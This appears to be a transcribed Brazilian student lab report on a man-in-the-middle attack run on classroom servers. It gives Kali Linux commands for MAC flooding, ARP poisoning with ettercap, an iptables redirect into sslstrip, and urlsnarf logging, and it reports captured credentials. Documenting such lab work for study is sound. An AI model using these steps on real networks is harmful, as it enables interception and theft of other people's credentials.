faculdade de tecnologia senac goiás henrique ferreira da silva

Сomentários

Transcrição

faculdade de tecnologia senac goiás henrique ferreira da silva
FACULDADE DE TECNOLOGIA SENAC GOIÁS
HENRIQUE FERREIRA DA SILVA
ADELTON HENRIQUE
ALINE GRAZIELLE NUNES
ABISHAI LEMES BORGES NETO
PROJETO INTEGRADOR
GOIANIA
2015/1
HENRIQUE FERREIRA DA SILVA
ADELTON HENRIQUE
ALINE GRAZIELLE NUNES
ABISHAI LEMES BORGES NETO
MITM
Trabalho de Tecnologia de Redes
Apresentado
a
Faculdade
de
Tecnologia Senac Goiás. Curso de
graduação tecnologia em Segurança
da Informação.
Orientador: Prof. Marissol Martins
GOIÂNIA
2015/1
Sistema Operacional utilizado para intermediar o ataque: Kali Linux 1.1.0a.
Ferramentas utilizadas: Nativas do O.S (Nmap, Ettercap, Arpspoof, Macof,
sslstrip, urlsnarf).
Abaixo passo a passo do experimento realizado em servidores próprios
configurados em sala de aula
Acessando o terminal:
#ifconfig (verificando interfaces de rede )
#route (verifica a tabela de rotas e gateway)
#nmap –sP rede (Faz um scanner na rede para descobrir host ativos )
#echo 1 > /proc/sys/net/ipv4/ip_forward ( Habilita o encaminhamento de
pacotes pelo Kernel)
#iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –
to-port 10000 (Direciona o trafego que chega na porta 80 para a porta 10000)
#macof (Inunda a tabela mac do switch)
Abaixo printscreen da tabela mac do switch antes e depois do ataque ser
iniciado.
Antes:
Depois:
#ettercap –T –q –i eth0 –M ARP:REMOTE /ip da vitima/ /ip do roteador/
(ettercap: faz a capitura do trafego. No caso abaixo foi usado para a rede toda)
Explicando as funções
-T – Usar em modo texto somente
-q – Usar modo silencioso
-i – Definição de interface.
SSLStrip - é uma ferramenta que pode passar as ligações SSL a ligações
normais sem SSL, permitindo assim que os dados que deveriam estar
encriptados passarem sem qualquer tipo de proteção.
#sslstrip –l 10000 (Mesma porta apontada no iptables)
Urlsnarf gera log de acesso a sites
#urlsnarf –i eth0
Abaixo imagem de log gerado pelo urlsnarf
Abaixo printscreen de credencias capituradas com sslstrip e urlsnarf
Atenção: Roubo de Informações é CRIME, sujeito as penalidades da
Lei: 12.737, o mal uso do conteúdo deste artigo é de sua total responsabilidade
pois o mesmo tem como objetivo destacar os riscos que estamos expostos a
realizar um simples acesso a conta do Facebook em uma LanHouse por
exemplo.

Documentos relacionados

Relatório Man-In-The

Relatório Man-In-The Para realizar o ataque será necessário o estudo da ferramenta e técnicas já desenvolvidas para o ataque de transbordamento da tabela CAM do switch e para ataque de Man-In-The-Middle

Leia mais